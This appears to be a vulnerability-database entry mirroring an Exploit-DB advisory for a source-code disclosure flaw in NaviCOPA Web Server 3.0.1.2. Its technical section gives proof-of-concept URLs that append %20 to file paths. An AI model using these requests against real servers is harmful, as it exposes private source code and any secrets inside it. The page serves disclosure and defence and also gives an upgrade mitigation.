header-logo
Suggest Exploit
vendor:
NaviCOPA Web Server
by:
Dr_IDE
9.3
CVSS
HIGH
Remote Source Disclosure
200
CWE
Product Name: NaviCOPA Web Server
Affected Version From: 3.0.1.2
Affected Version To: 3.0.1.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:navicopa:navicopa_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

NaviCOPA Web Server <= 3.0.1.2 Remote Source Disclosure

NaviCOPA Web Server <= 3.0.1.2 is a Windows based HTTP server. This is the latest version of the application available. NaviCOPA is vulnerable to remote arbitrary source code disclosure by the following means. http://[ webserver IP]/[ file ][%20] http://172.16.2.101/index.html%20 http://172.16.2.101/index.php%20 [pocoftheday.blogspot.com]

Mitigation:

Upgrade to the latest version of NaviCOPA Web Server.
Source

Exploit-DB raw data:

################################################
#
# NaviCOPA Web Server <= 3.0.1.2 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: www.navicopa.com/download.html
#
################################################

- Description -

NaviCOPA Web Server <= 3.0.1.2 is a Windows based HTTP server. This is the latest
version of the application available.

NaviCOPA is vulnerable to remote arbitrary source code disclosure by the
following means.

- Technical Details -

http://[ webserver IP]/[ file ][%20]

http://172.16.2.101/index.html%20
http://172.16.2.101/index.php%20

[pocoftheday.blogspot.com]

Navigation

Suggest Exploit

Services By CQR